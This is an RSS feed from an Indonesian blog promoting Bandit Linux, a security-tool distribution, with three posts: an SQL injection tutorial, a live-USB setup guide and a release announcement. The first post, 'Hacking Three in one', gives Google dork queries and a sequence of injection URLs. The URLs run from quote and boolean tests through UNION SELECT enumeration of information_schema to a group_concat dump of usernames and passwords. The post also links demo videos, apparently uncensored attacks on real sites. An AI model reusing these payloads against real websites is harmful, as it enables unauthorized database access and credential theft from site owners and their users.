<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>BANDIT</title>
	<atom:link href="http://virologi.info/banditos/feed/" rel="self" type="application/rss+xml" />
	<link>http://virologi.info/banditos</link>
	<description>to develop free OS with bandit</description>
	<pubDate>Sat, 06 Mar 2010 13:00:52 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.5</generator>
	<language>en</language>
			<item>
		<title>Hacking Three in one</title>
		<link>http://virologi.info/banditos/2008/12/hacking-three-in-one/</link>
		<comments>http://virologi.info/banditos/2008/12/hacking-three-in-one/#comments</comments>
		<pubDate>Sat, 20 Dec 2008 18:52:47 +0000</pubDate>
		<dc:creator>deanet</dc:creator>
		
		<category><![CDATA[hacking]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[bandit]]></category>

		<category><![CDATA[blind]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[mysql]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://virologi.info/banditos/?p=25</guid>
		<description><![CDATA[Hacking Three in one
Halu.. halu .. semuanya &#8230; masi ketemu lagi di &#8230;.  ..
Hacking three in one ?? weleh2 &#8230; kek game watch aja &#8230; hihiihih&#8230;
ok2&#8230; maksudna nih kita mo research or apa kek dengan 3 metode:

1. Google hacking
2. SQL Injection (based error)
3. Blind SQL Injection.
1. Google Hacking
Untuk Google hacking sendiri sudah banyak sekali [...]]]></description>
			<content:encoded><![CDATA[<p>Hacking Three in one</p>
<p>Halu.. halu .. semuanya &#8230; masi ketemu lagi di &#8230;. <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_mrgreen.gif' alt=':mrgreen:' class='wp-smiley' /> ..</p>
<p>Hacking three in one ?? weleh2 &#8230; kek game watch aja &#8230; hihiihih&#8230;</p>
<p>ok2&#8230; maksudna nih kita mo research or apa kek dengan 3 metode:</p>
<p><span id="more-25"></span></p>
<p>1. Google hacking<br />
2. SQL Injection (based error)<br />
3. Blind SQL Injection.</p>
<p>1. Google Hacking</p>
<p>Untuk Google hacking sendiri sudah banyak sekali cara atau syntax yang dipakai. Di internet sudah banyak juga yang membahas gimna sie kita mo pake googel untuk aktivitas hacking. Misalnya:</p>
<p>inurl:admin<br />
site:go.id<br />
domain:com</p>
<p>kalo ada yang mo nambahin silahkan &#8230; <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Video Tutorial bisa diunduh di sini<br />
<a href="http://www.4shared.com/file/76872164/9c602108/gogel-hacking.html" target="_blank">gogel-hacking.rar</a></p>
<p>2. SQL INJECTION</p>
<p>Teori:</p>
<p>1. Cek Vulnerability.</p>
<p>a. Letakkan karakter Single Quote pada akhri url address bar.<br />
ie : http://www.target.com/index.php?pageID=1&#8242; &lt;== karakter diletakkan di belakang url address bar.</p>
<p>b. Gunakan Operator Logika.<br />
Anda bisa gunakan operator and,or,dll.<br />
Ex 1 : and 1=1<br />
ie : http://www.target.com/index.php?pageID=1 and 1=1 &lt;== Return True,<br />
artinya jika kita meletakkan operator logika tersebut maka tidak terjadi error alias page berjalan dengan normal.</p>
<p>Ex 2 : and 1=2<br />
ie : http://www.target.com/index.php?pageID=1 and 1=2 &lt;== Return False,<br />
artinya jika kita meletakkan operator logika tersebut maka terjadi error alias page tidak berjalan dengan normal.</p>
<p>2. Cek Kolom.</p>
<p>ie :<br />
- http://www.target.com/index.php?pageID=1+order+by+1/* &lt;== Return True.<br />
- http://www.target.com/index.php?pageID=1+order+by+2/* &lt;== Return True.<br />
- http://www.target.com/index.php?pageID=1+order+by+3/* &lt;== Return True.<br />
- http://www.target.com/index.php?pageID=1+order+by+4/* &lt;== Return False.</p>
<p>Note : Kita asumsikan bahwa ketika kita memasukkan nilai 4, maka muncul pesan error &#8220;Unknown Colomn &#8216;4&#8242;&#8221;,<br />
maka kita dapat menarik suatu kesimpulan bahwa kolom yang ada hanya 1,2, dan 3.</p>
<p>3. Cek Hole Pada Kolom.<br />
Untuk mengecek di kolom berapa terdapat hole atau kolom yang bermasalah kita bisa gunakan stament<br />
&#8220;UNION ALL SELECT &#8221; atau &#8220;UNION SELECT &#8221; ,dll.</p>
<p>ie :<br />
- http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,2,3/*</p>
<p>4. Cek Versi MYSQL.<br />
Mengapa perlu mengecek versi dari MySQL? karena teknik sql injection untuk v 4.xx atau &lt; v 5.xx tidak sama.<br />
Pada contoh ini saya menggunakan v 5.xx. anda bisa pake @@version atau version() , terserrah mau pake yang mana .. yng penting maknyuss..</p>
<p>ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,@@version,3/*</p>
<p>Note : Kita Asumsikan versi dari mysql adalah 5.x.x</p>
<p>5. Cek Tabel dan Kolom.<br />
a. Cek Tabel.<br />
Untuk mengecek tabel gunakan statement berikut :<br />
&#8221; information_schema.tables + table_name &#8221;</p>
<p>ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,table_name,3+from+information_schema.tables/*</p>
<p>b. Cek Kolom<br />
Cara pengecekan kolom hampir sama dengan pengecekan tabel, hanya saja pada pengecekan kolom kita gunakan statement berikut :<br />
&#8221; information_schema.columns &#8230; column_name &#8230; &#8221;</p>
<p>ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns/*</p>
<p>Untuk mengekstrak kolom pada tabel tertentu kita bisa gunakan statement berikut :</p>
<p>ie:<br />
http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,column_name,3+from+information_schema.columns+where+table_name=&#8217;user&#8217;/*</p>
<p>6. Get Value of Colomn.<br />
Setelah kita ketahui nama-nama kolom yang ada pada table, maka langkah selanjutnya adalah mengekstrak nilai-nilai tersebut.<br />
Untuk mengekstrak nilai tersebut kita bisa melakukannya secara satu persatu dan atau secara keseluruhan atau bersamaan.</p>
<p>Note : Asumsikan bahwa kita mengetahui bahwa table user memiliki kolom &#8216;username&#8217; dan &#8216;password&#8217;.</p>
<p>a. Secara satu per satu.<br />
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,username,3+from+user/*<br />
ie : http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,password,3+from+user/*</p>
<p>atau secara bersamaaan</p>
<p>http://www.target.com/index.php?pageID=-1+UNION+ALL+SELECT+1,group_concat(username,0&#215;3a,password),3+from+user/*</p>
<p>itu mah cuman teoriiiiiiii !!!!! mana realitanya ???????? <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_evil.gif' alt=':evil:' class='wp-smiley' /> </p>
<p>tenang BOSSS <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> &#8230;. (njiplak dikit dr w3hol)</p>
<p>tenang boss&#8230; silahkan realita na di sini <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><a href="http://www.4shared.com/file/76872445/df9ab1f7/bandit-goto-campus.html" target="_blank">bandit-goto-campus.rar</a></p>
<p>3. Blind SQL Injection</p>
<p>secara inti jalan / cara methode nya sama dengan SQL Injection. Tetapi ada yang beda&#8230; nah lo .. apa lagi nih&#8230;&#8230;</p>
<p>Serupa tapi tak sama. Yup.. kira2 begitulah..</p>
<p>Jika didalam SQL injection menampilkan error karena &#8220;unknown column&#8221; atau error yang lain, tapi didalam teknik Blind SQL Injection halaman yang ditampilkan bisa berupa halaman yang kosong / blank / blind , atau bisa juga berubah menjadi artikel lain (REAL BLIND) , atau bisa juga tidak ada artikel yang ditampilkan, seperti gambar berikut</p>
<p>blind.png</p>
<p>untuk memastikan kembali apakah benar2 ada vulneralbility, kita bisa mengecek jumlah kolom dengan order by, karena bisa saja itu REAL BLIND, dan pasti akan terasa sangat susah <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_mrgreen.gif' alt=':mrgreen:' class='wp-smiley' /> . Jika hnya blind saja, cara selanjutnya yg digunakan sama dengan teknik SQL Injection.</p>
<p>utk pratekna bisa dlihat di sini. <a href="http://www.4shared.com/file/76872811/ac9a78cf/tapsel.html" target="_blank">tapsel.rar</a></p>
<p>saya kira cukup segini aj &#8230;kalo aada kurang lebihnya saya mohon maap ^^</p>
<p>just learn&#8230; diatas langit masi ada langit &#8230;..</p>
<p>cmiiw</p>
<p>**sori gak sempet nyensor&#8230; me bukan anggota KPI sie &#8230; ;p</p>
<p>thx to:</p>
<p>- Stuff, Crew and members of virologi.info<br />
- Stuff, Crew and members of echo.or.id<br />
- witecloner dkk .. love u guyss&#8230; muachhh <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
<p>reference:</p>
<p>1. <a href="http://echo.or.id" target="_new">echo.or.id (byk sekali tutorna disini)</a><br />
2. <a href="http://www.milw0rm.com/papers/202" target="_new">Marezzi paper</a></p>
]]></content:encoded>
			<wfw:commentRss>http://virologi.info/banditos/2008/12/hacking-three-in-one/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Membuat Bandit Linux Live USB Flash</title>
		<link>http://virologi.info/banditos/2008/12/membuat-bandit-linux-live-usb-flash/</link>
		<comments>http://virologi.info/banditos/2008/12/membuat-bandit-linux-live-usb-flash/#comments</comments>
		<pubDate>Wed, 17 Dec 2008 04:47:24 +0000</pubDate>
		<dc:creator>w3hol</dc:creator>
		
		<category><![CDATA[Tips &amp; Trick]]></category>

		<category><![CDATA[Tutorial]]></category>

		<category><![CDATA[bandit]]></category>

		<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://virologi.info/banditos/?p=17</guid>
		<description><![CDATA[




hello semua ..
wah rupanya ini posting ke dua saya di bandit, langsung aja yach&#8230; 
salah satu kelebihan bandit linux adalah ke-portable-an nya .. karena bandit linux sangat mudah dibuat agar dapat langsung di-boot dari usb flah disk &#8230;  dengan syarat komputer anda harus mendukung untuk booting dari usb flash disk, biasanya laptop atau komputer [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp">
<dl id="attachment_18" class="wp-caption alignleft" style="width: 105px;">
<dt class="wp-caption-dt"><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-posting.jpg"><img class="size-thumbnail wp-image-18" title="bandit-posting" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-posting-144x150.jpg" alt="Linux Force" width="95" height="99" /></a></dt>
</dl>
</div>
<p>hello semua ..<br />
wah rupanya ini posting ke dua saya di bandit, langsung aja yach&#8230; <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /><br />
salah satu kelebihan bandit linux adalah ke-portable-an nya .. karena bandit linux sangat mudah dibuat agar dapat langsung di-boot dari usb <strong>flah disk</strong> &#8230; <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> dengan syarat komputer anda harus mendukung untuk booting dari usb flash disk, biasanya laptop atau komputer jaman skrang bios nya sudah mendukung untuk booting dari flash disk.</p>
<p>pada tips kali ini, saya akan menerangkan bagaimana membuat Bandit Linux OS Live USB kita.. kita akan menginstallnya ke usb flash disk dari sistem operasi windowS &#8230;  <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> !!! loh2 kok kenapa dari <span style="text-decoration: line-through;">windoWs ..</span> ??? tenang boSs &#8230; untuk awal saya kasih tau cara yang termudah dahulu yaitu dari <span style="text-decoration: line-through;">windows&#8230;</span> .</p>
<p>Nah bisa gak Membuat Live USB bandit Dari Linux ??? untuk Membuat Live USB Bandit dari sistem operasi <strong>linux </strong>sangat bisa sekali&#8230; <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> !! nanti akan saya posting di kesempatan berikutnya .. <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> sabaR ya .. Hikzz</p>
<p>Persiapan :</p>
<ol>
<li>ISO Bandit Linux Yang Dapat di Download Dari : <a href="http://repo.ugm.ac.id/iso/bandit/" target="_blank">http://repo.ugm.ac.id/iso/bandit/</a></li>
<li>Winrar untuk mengekstrak file ISO tersebut</li>
</ol>
<p>Setelah Anda Download ISO-nya anda ekstrak dengan program winrar seperti yang anda lihat pada screen shoot dibwah ini :</p>
<p><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-live-usb.jpg"><img class="alignnone size-medium wp-image-19" title="bandit-live-usb" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-live-usb-230x300.jpg" alt="" width="230" height="300" /></a></p>
<p><span id="more-17"></span></p>
<p>setelah anda pilih extratc here, anda akan menemukan 2 folder hasil ekstrakan yaitu folder : boot dan bandit seperti terlihat di screen shoot dibawah ini :</p>
<p><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-on-usb.jpg"><img class="alignnone size-full wp-image-20" title="bandit-on-usb" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-on-usb.jpg" alt="" width="337" height="90" /></a></p>
<p>kemudian copykan folder tersebut ke usb flash anda :D, &#8230;..<br />
setelah proses copy sudah selesai masuk ke direktori boot di usb flash anda dan cari file yang bernama : bootinst.bat seperti screen shoot dibawah ini :<br />
<a href="http://virologi.info/banditos/wp-content/uploads/2008/12/boot.jpg"><img class="alignnone size-full wp-image-21" title="boot" src="http://virologi.info/banditos/wp-content/uploads/2008/12/boot.jpg" alt="" width="195" height="56" /></a></p>
<p>setelah ketemu file tersebut anda klik dan anda akan mendapat menu kurang lebih seperti ini :<br />
<a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-cmd.jpg"><img class="alignnone size-medium wp-image-22" title="bandit-cmd" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-cmd-300x88.jpg" alt="" width="300" height="88" /></a></p>
<p>tekan apa saja untuk melanjutkan, skrip tersebut akan menginstall bootloader ke MBR Flash Disk anda yang nantinya akan digunakan untuk proses booting. kemudian akan muncul konfirmasi seperti berikut dan tekan apa saja untuk menyimpan konfigurasi dan selesai :</p>
<p><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bat-bandit.jpg"><img class="alignnone size-medium wp-image-23" title="bat-bandit" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bat-bandit-300x81.jpg" alt="" width="300" height="81" /></a></p>
<p>semua proses sudah selesai &#8230; skrang TEST .. Test &#8230; <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>NB : jangan lupa untuk mengganti Konfigurasi BIOS anda agar booting dari USB Flash <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>selamat Mencoba <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>thanks : <a href="http://w3hol.wordpress.com/" target="_self">w3hol</a></p>
]]></content:encoded>
			<wfw:commentRss>http://virologi.info/banditos/2008/12/membuat-bandit-linux-live-usb-flash/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Welcome TO Bandit OS Linux</title>
		<link>http://virologi.info/banditos/2008/12/welcome-to-bandit-os-linux/</link>
		<comments>http://virologi.info/banditos/2008/12/welcome-to-bandit-os-linux/#comments</comments>
		<pubDate>Sun, 14 Dec 2008 00:48:11 +0000</pubDate>
		<dc:creator>w3hol</dc:creator>
		
		<category><![CDATA[news]]></category>

		<category><![CDATA[bandit]]></category>

		<category><![CDATA[linux]]></category>

		<guid isPermaLink="false">http://virologi.info/banditos/?p=3</guid>
		<description><![CDATA[
Bandit Linux adalah sebuah Sistem operasi hasil Remaster anak bangsa indonesia hikzz dari turunan distro linux aslinya yaitu Slackware dan Backtrack, wah apa sih Remaster itu sendiri ?? Remaster adalah sebuah proses merangkai sebuah sistem yang kemudian menjadi sistem operasi yang bisa digunakan sesuai kebutuhan kita.
Tampilan Bandit Linux ini look and feelnya sengaja dibuat semirip [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://virologi.info/banditos/"><img class="alignnone" title="bandit linux" src="http://www.virologi.info/gambar/bandit5.gif" alt="" width="348" height="148" /></a></p>
<p><strong>Bandit Linux</strong> adalah sebuah Sistem operasi hasil Remaster anak bangsa indonesia hikzz dari turunan distro linux aslinya yaitu Slackware dan Backtrack, wah apa sih <strong>Remaster</strong> itu sendiri ?? Remaster adalah sebuah proses merangkai sebuah sistem yang kemudian menjadi sistem operasi yang bisa digunakan sesuai kebutuhan kita.</p>
<p>Tampilan Bandit Linux ini look and feelnya sengaja dibuat semirip windows, agar user yang terbiasa menggunakan windows tidak kaget yang kata orang Linux itu SeyeMM ..!! <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> hikzz.. Bandit Linux menjadikan anda lebih portable karena Sistem operasi bandit ini bisa anda pasang di Flash Disk anda.. <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>berikut screen shoot bandit Linux :</p>
<div id="attachment_4" class="wp-caption aligncenter" style="width: 310px"><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-1.jpg"><img class="size-medium wp-image-4" title="bandit linux" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-1-300x180.jpg" alt="bandit linux" width="300" height="180" /></a><p class="wp-caption-text">Desktop bandit linux</p></div>
<div id="attachment_5" class="wp-caption aligncenter" style="width: 310px"><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-2.jpg"><img class="size-medium wp-image-5" title="bandit linux" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-2-300x180.jpg" alt="" width="300" height="180" /></a><p class="wp-caption-text">multimedia, wireless, command line</p></div>
<p><span id="more-3"></span></p>
<div id="attachment_6" class="wp-caption aligncenter" style="width: 310px"><a href="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-3.jpg"><img class="size-medium wp-image-6" title="Bandit Linux" src="http://virologi.info/banditos/wp-content/uploads/2008/12/bandit-3-300x180.jpg" alt="Installer &amp; Explorer" width="300" height="180" /></a><p class="wp-caption-text">Installer &amp; Explorer</p></div>
<p style="text-align: left;">
<p>Nama OS : BANDIT<br />
Singkatan : Barricade Administration Network and Defensive Internet Tools<br />
Distro : Slackware, Backtrack<br />
Kernel : 2.6.24.5<br />
Paket : Internet,Security Tools, Multimedia<br />
Developer :<br />
- <a href="http://rachmatfebrianto.com/">w3hol</a><br />
- <a href="http://numpanglewat.wordpress.com/">deanet</a><br />
- edge_mank (thanks buat dia untuk design logo bandit)<br />
- dan anda selanjutnya &#8230;. <img src='http://virologi.info/banditos/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Supported By : <a href="http://virologi.info">aat_shadewa</a><br />
&#8212;&#8212;&#8212;&#8212;&#8212;-</p>
<p>Baca Juga : <a href="http://virologi.info/virologist/modules/news/article.php?storyid=360" target="_blank">Peluncuran OS Baru Virologi (BANDIT)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://virologi.info/banditos/2008/12/welcome-to-bandit-os-linux/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
